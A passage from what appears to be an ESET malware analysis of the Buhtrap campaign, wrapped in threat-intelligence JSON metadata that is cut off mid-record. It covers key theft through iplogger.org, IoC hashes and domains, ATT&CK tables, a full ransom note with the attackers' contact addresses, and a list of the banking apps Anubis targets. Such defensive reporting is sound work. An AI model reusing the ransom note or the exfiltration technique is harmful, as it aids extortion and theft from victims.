The malware uses iplogger.org as an exfiltration channel to capture the WIF private key. To do so, the operators put the private key data in the User-Agent HTTP header, as shown in Figure 12.\r\nFigure 12. IP Logger console with exfiltrated data\r\nAs for the exfiltration of the wallets, the operators did not use iplogger.org; the limitation of 255 characters in the User-Agent field displayed in IP Logger’s web interface might explain why they opted for another method. In the samples we analyzed, the other exfiltration server was stored in the environment variable DiscordWebHook. 
What’s puzzling to us is that this environment variable is never set anywhere in the code. This seems to suggest that the malware is still under development and that this variable is set on the operators’ test machines.\r\nThere is another indicator that the malware is still under development. The binary includes two iplogger.org URLs, and both are queried upon exfiltration. In the request to one of these URLs, the value in the Referer field is prefixed with “DEV /”. We also found a version of the malware that wasn’t packed with ConfuserEx, and the getter for this URL is called DevFeedbackUrl. Based on the name of the environment variable, we believe the operators are planning to use the legitimate service Discord and abuse its webhook system to exfiltrate cryptocurrency wallets.\r\nConclusion\r\nThis campaign is a good example of how legitimate ad services can be abused to distribute malware. While this campaign specifically targets Russian organizations, we wouldn’t be surprised if such a scheme were used abusing non-Russian ad services. 
To avoid being caught by such a scam, users should always make sure the source from which they download software is a well-known, reputable software distributor.\r\nIndicators of Compromise (IoCs)\r\nList of samples\r\nSHA-1 | Filename | ESET Detection Name\r\n79B6EC126818A396BFF8AD438DB46EBF8D1715A1 | hashfish.exe | Win32/ClipBanker.HM\r\n11434828915749E591254BA9F52669ADE580E5A6 | hashfish.apk | Android/Spy.Banker.KW\r\nBC3EE8C27E72CCE9DB4E2F3901B96E32C8FC5088 | hashfish.exe | Win32/ClipBanker.HM\r\nCAF8ED9101D822B593F5AF8EDCC452DD9183EB1D | btctradebot.exe | Win32/ClipBanker.HM\r\nB2A1A7B3D4A9AED983B39B28305DD19C8B0B2C20 | blanki.exe | Win32/ClipBanker.HM\r\n1783F715F41A32DAC0BAFBBDF70363EC24AC2E37 | blanki.exe | Win32/Spy.Buhtrap.AE\r\n291773D831E7DEE5D2E64B2D985DBD24371D2774 | blanki.exe | Win32/Spy.Buhtrap.AE\r\n4ADD8DCF883B1DFC50F9257302D19442F6639AE3 | masterblankov24.exe | Win32/Spy.Buhtrap.AG\r\n790ADB5AA4221D60590655050D0FBEB6AC634A20 | masterblankov24.exe | Win32/Filecoder.Buran.A\r\nE72FAC43FF80BC0B7D39EEB545E6732DCBADBE22 | vseblanki24.exe | Win32/Filecoder.Buran.B\r\nB45A6F02891AA4D7F80520C0A2777E1A5F527C4D | vseblanki24.exe | Win32/Filecoder.Buran.C\r\n0C1665183FF1E4496F84E616EF377A5B88C0AB56 | vseblanki24.exe | Win32/Filecoder.Buran.C\r\n81A89F5597693CA85D21CD440E5EEAF6DE3A22E6 | vseblanki24.exe | Win32/Spy.RTM.W\r\nFAF3F379EB7EB969880AB044003537C3FB92464C | vseblanki24.exe | Win32/Spy.RTM.W\r\n81C7A225F4CF9FE117B02B13A0A1112C8FB3F87E | master-blankov24.exe | Win32/Filecoder.Buran.B\r\nED2BED87186B9E117576D861B5386447B83691F2 | blanki.exe | Win32/Filecoder.Buran.B\r\n6C2676301A6630DA2A3A56ACC12D66E0D65BCF85 | blanki.exe | Win32/Filecoder.Buran.B\r\n4B8A445C9F4A8EA24F42B9F80EA9A5E7E82725EF | mir_vseh_blankov_24.exe | Win32/Filecoder.Buran.B\r\nA390D13AFBEFD352D2351172301F672FCA2A73E1 | master_blankov_300.exe | Win32/Filecoder.Buran.B\r\n1282711DED9DB140EBCED7B2872121EE18595C9B | 
sbornik_dokumentov.exe | Win32/Filecoder.Buran.B\r\n372B4458D274A6085D3D52BA9BE4E0F3E84F9623 | sbornik_dokumentov.exe | MSIL/ClipBanker.IH\r\n9DE1F602195F6109464B1A7DEAA2913D2C803362 | nike.exe | MSIL/ClipBanker.IH\r\nList of servers\r\nDomain | IP address | Malware family\r\nsositehuypidarasi[.]com | 212.227.20[.]93, 87.106.18[.]146 | Android/Spy.Banker\r\nktosdelaetskrintotpidor[.]com | 87.106.18[.]146 | Android/Spy.Banker\r\n(none) | 94.100.18[.]67 | Win32/RTM\r\nstat-counter-7-1[.]bit | 176.223.165[.]112 | Win32/RTM\r\nstat-counter-7-2[.]bit | 95.211.214[.]14 | Win32/RTM\r\nblanki-shabloni24[.]ru | 37.1.221[.]248, 5.45.71[.]239 | (landing site)\r\nSuperjob[.]icu | 185.248.103[.]74 | Win32/Buhtrap\r\nMedialeaks[.]icu | 185.248.103[.]74 | Win32/Buhtrap\r\nicq.chatovod[.]info | 185.142.236[.]220 | Win32/Buhtrap\r\nwomens-history[.]me | 185.142.236[.]242 | Win32/Buhtrap\r\nMITRE ATT\u0026CK techniques\r\nWin32/Filecoder.Buran\r\nTactic | ID | Name | Description\r\nExecution | T1204 | User Execution | The user must run the executable\r\nDefense Evasion | T1116 | Code Signing | Some of the samples are signed\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information | The strings are encrypted using RC4\r\nDiscovery | T1083 | File and Directory Discovery | Files and directories are discovered for encryption\r\nDiscovery | T1135 | Network Share Discovery | Network shares are discovered to find more files to encrypt\r\nWin32/ClipBanker\r\nTactic | ID | Name | Description\r\nExecution | T1204 | User Execution | The user must run the executable\r\nDefense Evasion | T1116 | Code Signing | Some of the samples are signed\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information | The cryptocurrency addresses are encrypted using RC4\r\nMSIL/ClipBanker\r\nTactic | ID | Name | Description\r\nExecution | T1204 | User Execution | The user must run the executable\r\nPersistence | T1004 | Winlogon Helper DLL | Persistence is achieved by altering the Winlogon\\shell key\r\nDefense Evasion | T1116 | Code Signing | Some of the samples are signed\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information | The strings are encrypted using a static XOR key\r\nDefense Evasion | T1158 | Hidden Files and Directories | The executable used for persistence is in a newly created hidden directory\r\nDiscovery | T1083 | File and Directory Discovery | Looks for specific folders to find wallet application storage\r\nCollection | T1115 | Clipboard Data | Bitcoin WIF private keys are stolen from the clipboard data\r\nExfiltration | T1020 | Automated Exfiltration | Crypto wallet software’s storage is automatically exfiltrated\r\nExfiltration | T1041 | Exfiltration Over Command and Control Channel | Exfiltrated data is sent to a server\r\nCommand and Control | T1102 | Web Service | Uses the legitimate IP Logger service to exfiltrate Bitcoin WIF private keys\r\nCommand and Control | T1043 | Commonly Used Port | Communicates with a server using HTTPS\r\nCommand and Control | T1071 | Standard Application Layer Protocol | Communicates with a server using HTTPS\r\nBuhtrap downloader\r\nTactic | ID | Name | Description\r\nExecution | T1204 | User Execution | The user must run the executable\r\nExecution | T1106 | Execution through API | Executes additional malware through CreateProcess\r\nDefense Evasion | T1116 | Code Signing | Some of the samples are signed\r\nCredential Access | T1056 | Input Capture | Backdoor contains a keylogger\r\nCredential Access | T1111 | Two-Factor Authentication Interception | Backdoor actively searches for a connected smart card\r\nCollection | T1115 | Clipboard Data | Backdoor logs clipboard content\r\nExfiltration | T1020 | Automated Exfiltration | Log files are automatically exfiltrated\r\nExfiltration | T1022 | Data Encrypted | Data sent to the C\u0026C server is encrypted\r\nExfiltration | T1041 | Exfiltration Over Command and Control Channel | Exfiltrated data is sent to a server\r\nCommand and Control | T1043 | Commonly Used Port | Communicates with a server using HTTPS\r\nCommand and Control | T1071 | Standard Application Layer Protocol | HTTPS is used\r\nCommand and Control | T1105 | Remote File Copy | Backdoor can download and execute a file from the C\u0026C server\r\nAppendix A: Example of a ransom note\r\nOriginal version\r\nВНИМАНИЕ, ВАШИ ФАЙЛЫ ЗАШИФРОВАНЫ!\r\n \r\nВаши документы, фотографии, базы данных, сохранения в играх и другие\r\nважные данные были зашифрованы уникальным ключем, который находится\r\nтолько у нас. Для восстановления данных необходим дешифровщик.\r\n \r\nВосстановить файлы Вы можете, написав нам на почту:\r\ne-mail: sprosinas@cock.li\r\ne-mail: sprosinas2@protonmail.com\r\n \r\nПришлите Ваш идентификатор TOKEN и 1-2 файла, размером до 1 Мб каждый.\r\nМы их восстановим, в доказательство возможности расшифровки.\r\nПосле демонстрации вы получите инструкцию по оплате, а после оплаты\r\nВам будет отправлена программа-дешифратор, которая полностью восстановит\r\nвсе заблокированные файлы без потерь.\r\n \r\nЕсли связаться через почту не получается:\r\nПерейдите по ссылке: https://bitmessage.org/wiki/Main_Page и скачайте\r\nпочтовый клиент. 
Установите почтовый клиент и создайте себе новый адрес\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 16 of 26\n\nдля отправки сообщений.\r\nНапишите нам письмо на адрес: BM-2cVK1UBcUGmSPDVMo8TN7eh7BJG9jUVrdG\r\n(с указанием Вашей почты) и мы свяжемся с Вами.\r\n \r\nВАЖНО!\r\nРасшифровка гарантируется, если Вы свяжетесь с нами в течении 72 часов.\r\nВыключение или перезагрузка компьютера может привести к потере Ваших файлов.\r\nНе пытайтесь удалить программу или запускать антивирусные средства.\r\nПопытки самостоятельной расшифровки файлов приведут к потере Ваших данных.\r\nДешифраторы других пользователей несовместимы с Вашими данными,\r\nтак как у каждого пользователя уникальный ключ шифрования.\r\n \r\nУбедительная просьба писать людям, которые действительно заинтересованы\r\nв восстановлении файлов. Не следует угрожать и требовать дешифратор.\r\nЖалобами заблокировав e-mail, Вы лишаете возможности расшифровать свои\r\nфайлы остальных.\r\n \r\n-----BEGIN TOKEN-----\r\ndgQAAAAAAAC8+WfVlVPRbtowFH2PlH+4L5uoBFbsxEngrQVKWUe7NdDtYS8eMdRa\r\niJGdwCb143cdUlG6qtt4sIjv8fG95xz73m028D3fm6ml0VavKviiylzvLSTwyeiV\r\ntFbpUhQAu5hQksQBdfCRqOQAWED7PdajuDVXG9ygUY+yXhQ1EKN20jbk2VYsJahy\r\npWGlDeSuAkMswcLKHJryAPBH+91+FHXDOIDrC/zu8IiE/N0ZIi+NlM+RcTfhrJuw\r\nqEVGnMQNcq4rbPfIGcbduJ90g9Qhm25wyr0wsmntg9iJznx2BjEstjlOBYzCI9wa\r\nsSwk/sGpA8JocECiKC0q4ieoBFERf0Klr6GG2my1ERXK6XjTpxN/Kp+Nrhud7pWt\r\n3ShVnSuNYgcpjH9uDVoCc60L24DQrpAh4ZHmxUXONs7SlNAkcE6d5/q7hDspcmng\r\n6xQ6lGIrAT9DkkMt+2UrubEwLZdtz2gSttwCfe9SGJiJUqyRwd09rteyRE5tH7Df\r\n9+DqE6PrrTvFkJ2mQeJ7E63XKGqr4JUstnj+EdptvI00t5CQMEZC37sfwl1dVpgs\r\nC7NsejIkAvsHZxh7nt5Wswth1fJUsnGuGu17ML5ZvCXYq7yZKnbSFGr9UL11lqPY\r\nLOjTkGAWjpZknz9CJg0ywFBvMO4VhITDSFq1Llsz/9IV4gkPU4zjPxD/B5d7AHBe\r\nV7r1xTnSpv9FkBhJMeOEcvdubmS11+YHoOMYSBBlDoVeovvN4z48++HgG2bFLRO3\r\nXLll6pbf\r\n-----END TOKEN-----\r\nTranslated version\r\nATTENTION, YOUR FILES ARE ENCRYPTED!\r\n \r\nYour documents, photos, databases, 
saved games and other\r\nimportant data has been encrypted with a unique key that is in our possession.\r\nFor data recovery, a decryptor is required.\r\n \r\nYou can restore files by emailing us:\r\ne-mail: sprosinas@cock.li\r\ne-mail: sprosinas2@protonmail.com\r\n \r\nSend your TOKEN ID and 1-2 files, up to 1 MB each.\r\nWe will restore them, to prove the possibility of decoding.\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 17 of 26\n\nAfter the demonstration, you will receive instructions for payment,\r\nand after payment You will be sent a decryptor program that will fully\r\nrestore all locked files without loss.\r\n \r\nIf you cannot contact via mail:\r\nFollow the link: https://bitmessage.org/wiki/Main_Page and download\r\nmail client. Install the email client and create yourself a new address.\r\nto send messages.\r\nWrite us a letter to the address: BM-2cVK1UBcUGmSPDVMo8TN7eh7BJG9jUVrdG\r\n(with your mail) and we will contact you.\r\n \r\nIMPORTANT!\r\nDecryption is guaranteed if you contact us within 72 hours.\r\nTurning off or restarting your computer can result in the loss of your files.\r\nDo not attempt to uninstall the program or run anti-virus tools.\r\nAttempts to self-decrypt files will lead to the loss of your data.\r\nOther users' decoders are incompatible with your data,\r\nsince each user has a unique encryption key.\r\n \r\nPlease write to people who are really interested in recovering your files.\r\nYou should not threaten us and demand the decoder. 
Complaints blocking e-mail,\r\nyou would lose the opportunity to decrypt your remaining files.\r\n-----BEGIN TOKEN-----\r\ndgQAAAAAAAC8+WfVlVPRbtowFH2PlH+4L5uoBFbsxEngrQVKWUe7NdDtYS8eMdRa\r\niJGdwCb143cdUlG6qtt4sIjv8fG95xz73m028D3fm6ml0VavKviiylzvLSTwyeiV\r\ntFbpUhQAu5hQksQBdfCRqOQAWED7PdajuDVXG9ygUY+yXhQ1EKN20jbk2VYsJahy\r\npWGlDeSuAkMswcLKHJryAPBH+91+FHXDOIDrC/zu8IiE/N0ZIi+NlM+RcTfhrJuw\r\nqEVGnMQNcq4rbPfIGcbduJ90g9Qhm25wyr0wsmntg9iJznx2BjEstjlOBYzCI9wa\r\nsSwk/sGpA8JocECiKC0q4ieoBFERf0Klr6GG2my1ERXK6XjTpxN/Kp+Nrhud7pWt\r\n3ShVnSuNYgcpjH9uDVoCc60L24DQrpAh4ZHmxUXONs7SlNAkcE6d5/q7hDspcmng\r\n6xQ6lGIrAT9DkkMt+2UrubEwLZdtz2gSttwCfe9SGJiJUqyRwd09rteyRE5tH7Df\r\n9+DqE6PrrTvFkJ2mQeJ7E63XKGqr4JUstnj+EdptvI00t5CQMEZC37sfwl1dVpgs\r\nC7NsejIkAvsHZxh7nt5Wswth1fJUsnGuGu17ML5ZvCXYq7yZKnbSFGr9UL11lqPY\r\nLOjTkGAWjpZknz9CJg0ywFBvMO4VhITDSFq1Llsz/9IV4gkPU4zjPxD/B5d7AHBe\r\nV7r1xTnSpv9FkBhJMeOEcvdubmS11+YHoOMYSBBlDoVeovvN4z48++HgG2bFLRO3\r\nXLll6pbf\r\n-----END TOKEN-----\r\nAppendix B: Applications targeted by Anubis\r\nat.spardat.bcrmobile\r\nat.spardat.netbanking\r\ncom.bankaustria.android.olb\r\ncom.bmo.mobile\r\ncom.cibc.android.mobi\r\ncom.rbc.mobile.android\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 18 of 
26\n\ncom.scotiabank.mobile\r\ncom.td\r\ncz.airbank.android\r\neu.inmite.prj.kb.mobilbank\r\ncom.bankinter.launcher\r\ncom.kutxabank.android\r\ncom.rsi\r\ncom.tecnocom.cajalaboral\r\nes.bancopopular.nbmpopular\r\nes.evobanco.bancamovil\r\nes.lacaixa.mobile.android.newwapicon\r\ncom.dbs.hk.dbsmbanking\r\ncom.FubonMobileClient\r\ncom.hangseng.rbmobile\r\ncom.MobileTreeApp\r\ncom.mtel.androidbea\r\ncom.scb.breezebanking.hk\r\nhk.com.hsbc.hsbchkmobilebanking\r\ncom.aff.otpdirekt\r\ncom.ideomobile.hapoalim\r\ncom.infrasofttech.indianBank\r\ncom.mobikwik_new\r\ncom.oxigen.oxigenwallet\r\njp.co.aeonbank.android.passbook\r\njp.co.netbk\r\njp.co.rakuten_bank.rakutenbank\r\njp.co.sevenbank.AppPassbook\r\njp.co.smbc.direct\r\njp.mufg.bk.applisp.app\r\ncom.barclays.ke.mobile.android.ui\r\nnz.co.anz.android.mobilebanking\r\nnz.co.asb.asbmobile\r\nnz.co.bnz.droidbanking\r\nnz.co.kiwibank.mobile\r\ncom.getingroup.mobilebanking\r\neu.eleader.mobilebanking.pekao.firm\r\neu.eleader.mobilebanking.pekao\r\neu.eleader.mobilebanking.raiffeisen\r\npl.bzwbk.bzwbk24\r\npl.ipko.mobile\r\npl.mbank\r\nalior.bankingapp.android\r\ncom.comarch.mobile.banking.bgzbnpparibas.biznes\r\ncom.comarch.security.mobilebanking\r\ncom.empik.empikapp\r\ncom.empik.empikfoto\r\ncom.finanteq.finance.ca\r\ncom.orangefinansek\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 19 of 
26\n\neu.eleader.mobilebanking.invest\r\npl.aliorbank.aib\r\npl.allegro\r\npl.bosbank.mobile\r\npl.bph\r\npl.bps.bankowoscmobilna\r\npl.bzwbk.ibiznes24\r\npl.bzwbk.mobile.tab.bzwbk24\r\npl.ceneo\r\npl.com.rossmann.centauros\r\npl.fmbank.smart\r\npl.ideabank.mobilebanking\r\npl.ing.mojeing\r\npl.millennium.corpApp\r\npl.orange.mojeorange\r\npl.pkobp.iko\r\npl.pkobp.ipkobiznes\r\ncom.kuveytturk.mobil\r\ncom.magiclick.odeabank\r\ncom.mobillium.papara\r\ncom.pozitron.albarakaturk\r\ncom.teb\r\nccom.tmob.denizbank\r\ncom.tmob.tabletdeniz\r\ncom.vakifbank.mobilel\r\ntr.com.sekerbilisim.mbank\r\nwit.android.bcpBankingApp.millenniumPL\r\ncom.advantage.RaiffeisenBank\r\nhr.asseco.android.jimba.mUCI.ro\r\nmay.maybank.android\r\nro.btrl.mobile\r\ncom.amazon.mShop.android.shopping\r\ncom.amazon.windowshop\r\ncom.ebay.mobile\r\nru.sberbankmobile\r\nru.sberbank.spasibo\r\nru.sberbank_sbbol\r\nru.sberbank.mobileoffice\r\nru.sberbank.sberbankir\r\nru.alfabank.mobile.android\r\nru.alfabank.oavdo.amc\r\nby.st.alfa\r\nru.alfabank.sense\r\nru.alfadirect.app\r\nru.mw\r\ncom.idamob.tinkoff.android\r\nru.tcsbank.c2c\r\nru.tinkoff.mgp\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 20 of 
26\n\nru.tinkoff.sme\r\nru.tinkoff.goabroad\r\nru.vtb24.mobilebanking.android\r\nru.bm.mbm\r\ncom.vtb.mobilebank\r\ncom.bssys.VTBClient\r\ncom.bssys.vtb.mobileclient\r\ncom.akbank.android.apps.akbank_direkt\r\ncom.akbank.android.apps.akbank_direkt_tablet\r\ncom.akbank.softotp\r\ncom.akbank.android.apps.akbank_direkt_tablet_20\r\ncom.fragment.akbank\r\ncom.ykb.android\r\ncom.ykb.android.mobilonay\r\ncom.ykb.avm\r\ncom.ykb.androidtablet\r\ncom.veripark.ykbaz\r\ncom.softtech.iscek\r\ncom.yurtdisi.iscep\r\ncom.softtech.isbankasi\r\ncom.monitise.isbankmoscow\r\ncom.finansbank.mobile.cepsube\r\nfinansbank.enpara\r\ncom.magiclick.FinansPOS\r\ncom.matriksdata.finansyatirim\r\nfinansbank.enpara.sirketim\r\ncom.vipera.ts.starter.QNB\r\ncom.redrockdigimark\r\ncom.garanti.cepsubesi\r\ncom.garanti.cepbank\r\ncom.garantibank.cepsubesiro\r\ncom.matriksdata.finansyatirim\r\nbiz.mobinex.android.apps.cep_sifrematik\r\ncom.garantiyatirim.fx\r\ncom.tmobtech.halkbank\r\ncom.SifrebazCep\r\neu.newfrontier.iBanking.mobile.Halk.Retail\r\ntr.com.tradesoft.tradingsystem.gtpmobile.halk\r\ncom.DijitalSahne.EnYakinHalkbank\r\ncom.ziraat.ziraatmobil\r\ncom.ziraat.ziraattablet\r\ncom.matriksmobile.android.ziraatTrader\r\ncom.matriksdata.ziraatyatirim.pad\r\nde.comdirect.android\r\nde.commerzbanking.mobil\r\nde.consorsbank\r\ncom.db.mm.deutschebank\r\nde.dkb.portalapp\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 21 of 
26\n\ncom.de.dkb.portalapp\r\ncom.ing.diba.mbbr2\r\nde.postbank.finanzassistent\r\nmobile.santander.de\r\nde.fiducia.smartphone.android.banking.vr\r\nfr.creditagricole.androidapp\r\nfr.axa.monaxa\r\nfr.banquepopulaire.cyberplus\r\nnet.bnpparibas.mescomptes\r\ncom.boursorama.android.clients\r\ncom.caisseepargne.android.mobilebanking\r\nfr.lcl.android.customerarea\r\ncom.paypal.android.p2pmobile\r\ncom.wf.wellsfargomobile\r\ncom.wf.wellsfargomobile.tablet\r\ncom.wellsFargo.ceomobile\r\ncom.usbank.mobilebanking\r\ncom.usaa.mobile.android.usaa\r\ncom.suntrust.mobilebanking\r\ncom.moneybookers.skrillpayments.neteller\r\ncom.moneybookers.skrillpayments\r\ncom.clairmail.fth\r\ncom.konylabs.capitalone\r\ncom.yinzcam.facilities.verizon\r\ncom.chase.sig.android\r\ncom.infonow.bofa\r\ncom.bankofamerica.cashpromobile\r\nuk.co.bankofscotland.businessbank\r\ncom.grppl.android.shell.BOS\r\ncom.rbs.mobile.android.natwestoffshore\r\ncom.rbs.mobile.android.natwest\r\ncom.rbs.mobile.android.natwestbandc\r\ncom.rbs.mobile.investisir\r\ncom.phyder.engage\r\ncom.rbs.mobile.android.rbs\r\ncom.rbs.mobile.android.rbsbandc\r\nuk.co.santander.santanderUK\r\nuk.co.santander.businessUK.bb\r\ncom.sovereign.santander\r\ncom.ifs.banking.fiid4202\r\ncom.fi6122.godough\r\ncom.rbs.mobile.android.ubr\r\ncom.htsu.hsbcpersonalbanking\r\ncom.grppl.android.shell.halifax\r\ncom.grppl.android.shell.CMBlloydsTSB73\r\ncom.barclays.android.barclaysmobilebanking\r\ncom.unionbank.ecommerce.mobile.android\r\ncom.unionbank.ecommerce.mobile.commercial.legacy\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 22 of 
26\n\ncom.snapwork.IDBI\r\ncom.idbibank.abhay_card\r\nsrc.com.idbi\r\ncom.idbi.mpassbook\r\ncom.ing.mobile\r\ncom.snapwork.hdfc\r\ncom.sbi.SBIFreedomPlus\r\nhdfcbank.hdfcquickbank\r\ncom.csam.icici.bank.imobile\r\nin.co.bankofbaroda.mpassbook\r\ncom.axis.mobile\r\ncz.csob.smartbanking\r\ncz.sberbankcz\r\nsk.sporoapps.accounts\r\nsk.sporoapps.skener\r\ncom.cleverlance.csas.servis24\r\norg.westpac.bank\r\nnz.co.westpac\r\nau.com.suncorp.SuncorpBank\r\norg.stgeorge.bank\r\norg.banksa.bank\r\nau.com.newcastlepermanent\r\nau.com.nab.mobile\r\nau.com.mebank.banking\r\nau.com.ingdirect.android\r\nMyING.be\r\ncom.imb.banking2\r\ncom.fusion.ATMLocator\r\nau.com.cua.mb\r\ncom.commbank.netbank\r\ncom.cba.android.netbank\r\ncom.citibank.mobile.au\r\ncom.citibank.mobile.uk\r\ncom.citi.citimobile\r\norg.bom.bank\r\ncom.bendigobank.mobile\r\nme.doubledutch.hvdnz.cbnationalconference2016\r\nau.com.bankwest.mobile\r\ncom.bankofqueensland.boq\r\ncom.anz.android.gomoney\r\ncom.anz.android\r\ncom.anz.SingaporeDigitalBanking\r\ncom.anzspot.mobile\r\ncom.crowdcompass.appSQ0QACAcYJ\r\ncom.arubanetworks.atmanz\r\ncom.quickmobile.anzirevents15\r\nat.volksbank.volksbankmobile\r\nde.fiducia.smartphone.android.banking.vr\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 23 of 
26\n\nit.volksbank.android\r\nit.secservizi.mobile.atime.bpaa\r\nde.fiducia.smartphone.android.securego.vr\r\ncom.unionbank.ecommerce.mobile.commercial.legacy\r\ncom.isis_papyrus.raiffeisen_pay_eyewdg\r\nat.easybank.mbanking\r\nat.easybank.tablet\r\nat.easybank.securityapp\r\nat.bawag.mbanking\r\ncom.bawagpsk.securityapp\r\nat.psa.app.bawag\r\ncom.pozitron.iscep\r\ncom.vakifbank.mobile\r\ncom.pozitron.vakifbank\r\ncom.starfinanz.smob.android.sfinanzstatus\r\ncom.starfinanz.mobile.android.pushtan\r\ncom.entersekt.authapp.sparkasse\r\ncom.starfinanz.smob.android.sfinanzstatus.tablet\r\ncom.starfinanz.smob.android.sbanking\r\ncom.palatine.android.mobilebanking.prod\r\nfr.laposte.lapostemobile\r\nfr.laposte.lapostetablet\r\ncom.cm_prod.bad\r\ncom.cm_prod.epasal\r\ncom.cm_prod_tablet.bad\r\ncom.cm_prod.nosactus\r\nmobi.societegenerale.mobile.lappli\r\ncom.bbva.netcash\r\ncom.bbva.bbvacontigo\r\ncom.bbva.bbvawallet\r\nes.bancosantander.apps\r\ncom.santander.app\r\nes.cm.android\r\nes.cm.android.tablet\r\ncom.bankia.wallet\r\ncom.jiffyondemand.user\r\ncom.latuabancaperandroid\r\ncom.latuabanca_tabperandroid\r\ncom.lynxspa.bancopopolare\r\ncom.unicredit\r\nit.bnl.apps.banking\r\nit.bnl.apps.enterprise.bnlpay\r\nit.bpc.proconl.mbplus\r\nit.copergmps.rt.pf.android.sp.bmps\r\nit.gruppocariparma.nowbanking\r\nit.ingdirect.app\r\nit.nogood.container\r\nit.popso.SCRIGNOapp\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 24 of 
26\n\nposteitaliane.posteapp.apppostepay\r\ncom.abnamro.nl.mobile.payments\r\ncom.triodos.bankingnl\r\nnl.asnbank.asnbankieren\r\nnl.snsbank.mobielbetalen\r\ncom.btcturk\r\ncom.finansbank.mobile.cepsube\r\ncom.ingbanktr.ingmobil\r\ncom.kuveytturk.mobil\r\ncom.magiclick.odeabank\r\ncom.mobillium.papara\r\ncom.pozitron.albarakaturk\r\ncom.teb\r\ncom.tmob.denizbank\r\ncom.ykb.android\r\nfinansbank.enpara\r\ntr.com.hsbc.hsbcturkey\r\ntr.com.sekerbilisim.mbank\r\ncom.Plus500\r\neu.unicreditgroup.hvbapptan\r\ncom.targo_prod.bad\r\ncom.db.pwcc.dbmobile\r\ncom.db.mm.norisbank\r\ncom.bitmarket.trader\r\ncom.plunien.poloniex\r\ncom.bitmarket.trader\r\ncom.mycelium.wallet\r\ncom.bitfinex.bfxapp\r\ncom.binance.dev\r\ncom.btcturk\r\ncom.binance.odapplications\r\ncom.blockfolio.blockfolio\r\ncom.crypter.cryptocyrrency\r\nio.getdelta.android\r\ncom.edsoftapps.mycoinsvalue\r\ncom.coin.profit\r\ncom.mal.saul.coinmarketcap\r\ncom.tnx.apps.coinportfolio\r\ncom.coinbase.android\r\ncom.portfolio.coinbase_tracker\r\nde.schildbach.wallet\r\npiuk.blockchain.android\r\ninfo.blockchain.merchant\r\ncom.jackpf.blockchainsearch\r\ncom.unocoin.unocoinwallet\r\ncom.unocoin.unocoinmerchantPoS\r\ncom.thunkable.android.santoshmehta364.UNOCOIN_LIVE\r\nwos.com.zebpay\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 25 of 26\n\ncom.localbitcoinsmbapp\r\ncom.thunkable.android.manirana54.LocalBitCoins\r\ncom.thunkable.android.manirana54.LocalBitCoins_unblock\r\ncom.localbitcoins.exchange\r\ncom.coins.bit.local\r\ncom.coins.ful.bit\r\ncom.jamalabbasii1998.localbitcoin\r\nzebpay.Application\r\ncom.bitcoin.ss.zebpayindia\r\ncom.kryptokit.jaxx\r\nSource: https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nhttps://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/\r\nPage 26 of 26",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE",
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/2019/04/30/buhtrap-backdoor-ransomware-advertising-platform/"
	],
	"report_names": [
		"buhtrap-backdoor-ransomware-advertising-platform"
	],
	"threat_actors": [
		{
			"id": "01d569b1-f089-4a8f-8396-85078b93da26",
			"created_at": "2023-01-06T13:46:38.411615Z",
			"updated_at": "2026-04-10T02:00:02.963422Z",
			"deleted_at": null,
			"main_name": "BuhTrap",
			"aliases": [],
			"source_name": "MISPGALAXY:BuhTrap",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3b046db2-f60e-49ae-8e16-0cf82a4be6fb",
			"created_at": "2022-10-25T16:07:23.427162Z",
			"updated_at": "2026-04-10T02:00:04.594113Z",
			"deleted_at": null,
			"main_name": "Buhtrap",
			"aliases": [
				"Buhtrap",
				"Operation TwoBee",
				"Ratopak Spider",
				"UAC-0008"
			],
			"source_name": "ETDA:Buhtrap",
			"tools": [
				"AmmyyRAT",
				"Buhtrap",
				"CottonCastle",
				"FlawedAmmyy",
				"NSIS",
				"Niteris EK",
				"Nullsoft Scriptable Install System",
				"Ratopak"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "75108fc1-7f6a-450e-b024-10284f3f62bb",
			"created_at": "2024-11-01T02:00:52.756877Z",
			"updated_at": "2026-04-10T02:00:05.273746Z",
			"deleted_at": null,
			"main_name": "Play",
			"aliases": null,
			"source_name": "MITRE:Play",
			"tools": [
				"Nltest",
				"AdFind",
				"PsExec",
				"Wevtutil",
				"Cobalt Strike",
				"Playcrypt",
				"Mimikatz"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
